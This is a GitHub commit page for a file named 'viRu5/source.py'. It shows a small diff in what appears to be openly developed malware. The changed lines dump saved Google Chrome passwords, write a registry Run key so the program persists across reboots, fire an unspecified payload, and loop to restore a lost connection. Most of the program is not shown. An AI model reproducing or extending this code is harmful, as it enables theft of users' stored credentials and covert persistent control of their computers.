Skip to content

Commit

Permalink
Update source.py
Browse files Browse the repository at this point in the history
  • Loading branch information
islamTaha12 authored Jul 3, 2016
1 parent 4ac96a7 commit a7f90b7
Showing 1 changed file with 5 additions and 2 deletions.
7 changes: 5 additions & 2 deletions viRu5/source.py
Original file line number Diff line number Diff line change
Expand Up @@ -111,13 +111,16 @@ def dump_google_password():
pass
passGoogle.close()

# set the reg value in run key
set_reg_key_value(REG_PATH,REG_NAME,REG_VALUE)

# fire the payload
fire()
time.sleep(5)
# set the reg value in run key
set_reg_key_value(REG_PATH,REG_NAME,REG_VALUE)

# dump google chrome password
dump_google_password()

# keep firing in case of the connection is loss
while True:
run_after_close()
Expand Down

0 comments on commit a7f90b7

Please sign in to comment.